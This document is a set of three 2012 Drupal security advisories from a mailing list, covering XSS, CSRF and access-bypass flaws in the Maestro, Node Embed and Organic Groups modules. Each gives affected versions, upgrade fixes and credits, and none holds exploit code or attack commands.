View online: http://drupal.org/node/1619830 * Advisory ID: DRUPAL-SA-CONTRIB-2012-094 * Project: Maestro [1] (third-party module) * Version: 7.x * Date: 2012-June-06 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Cross Site Request Forgery DESCRIPTION - The Maestro module is a workflow engine/solution that facilitates simple and complex business process automation. The module doesn't sufficiently filter user-supplied data in its admin screens leading to a Cross Site Scripting (XSS) vulnerability. A Cross Site Request Forgery vulnerability in the control of the module could allow a user to change workflows including injecting malicious scripts to exploit the XSS. This vulnerability is mitigated by the fact that an attacker must have a role with the maestro admin permissions or use CSRF against a user with that permission. CVE: Requested VERSIONS AFFECTED --- * maestro 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Maestro [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the maestro module for Drupal 7.x, upgrade to Maestro 7.x-1.2 [4] Also see the Maestro [5] project page. REPORTED BY - * Steve Persch [6] FIXED BY * Blaine Lang [7] module maintainer * Randy Kolenko [8] module maintainer * Greg Knaddison [9] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team * Stella Power [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/maestro [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/maestro [4] http://drupal.org/node/1617952 [5] http://drupal.org/project/maestro [6] http://drupal.org/user/179805 [7] http://drupal.org/user/726382 [8] http://drupal.org/user/704970 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/66894 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-093 - Node Embed - Access Bypass
View online: http://drupal.org/node/1619824 * Advisory ID: DRUPAL-SA-CONTRIB-2012-093 * Project: Node Embed [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Node Embed gives content editors an interface for selecting and embedding nodes using a WYSIWYG editor. The interface for selecting nodes is a page that had no access check, allowing users to view node titles they might not have access to. This issue only affects your site if you have unpublished nodes or use a node access module to restrict content access from some users. CVE: Requested VERSIONS AFFECTED --- * Node Embed 6.x-1.x versions prior to 6.x-1.5. * Node Embed 7.x-1.x versions prior to 7.x-1.0. Drupal core is not affected. If you do not use the contributed Node Embed [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Node Embed module for Drupal 6.x, upgrade to Node Embed 6.x-1.5 [4] * If you use the Node Embed module for Drupal 7.x, upgrade to Node Embed 7.x-1.0 [5] Also see the Node Embed [6] project page. REPORTED BY - * Paul Aumer-Ryan [7] FIXED BY * Scott Reynen [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/node_embed [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/node_embed [4] http://drupal.org/node/1618430 [5] http://drupal.org/node/1618428 [6] http://drupal.org/project/node_embed [7] http://drupal.org/user/422353 [8] http://drupal.org/user/109890 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-092 - Organic Groups - Cross Site Scripting (XSS) and Access Bypass
View online: http://drupal.org/node/1619810 * Advisory ID: DRUPAL-SA-CONTRIB-2012-092 * Project: Organic groups [1] (third-party module) * Version: 6.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Access bypass DESCRIPTION - The Organic Groups module enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves. Cross Site Scripting The module doesn't sufficiently filter user supplied text when used in connection with the Vertical Tabs module. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create or edit a group title and the site must have the contributed Vertical Tabs module installed and the Vertical Tabs configuration must include the Organic Group select area (this is the default configuration when Vertical Tabs is enabled). Access bypass The module's default views do not sufficiently check the Drupal core permission to /access content/. This vulnerability is mitigated by the fact that a site must have removed the "access content" permission to all users. This is not a common configuration. CVE: Requested VERSIONS AFFECTED --- * Organic groups 6.x-2.x versions prior to 6.x-2.4. Drupal core is not affected. If you do not use the contributed Organic groups [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Organic groups module for Drupal 6.x, upgrade to Organic Groups 6.x-2.4 [4] Also see the Organic groups [5] project page. REPORTED BY - * Ezra Barnett Gildesgame [6] identified the Cross Site Scripting issue * Fox [7] identified the Access Bypass issue FIXED BY * Adam Ross [8] the module maintainer * Fox [9] * Greg Knaddison [10] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [11] of the Drupal Security Team * Forest Monsen [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/og [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/og [4] http://drupal.org/node/1619736 [5] http://drupal.org/project/og [6] http://drupal.org/user/69959 [7] http://drupal.org/user/426416 [8] http://drupal.org/user/346868 [9] http://drupal.org/user/426416 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/36762 [12] http://drupal.org/user/181798 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
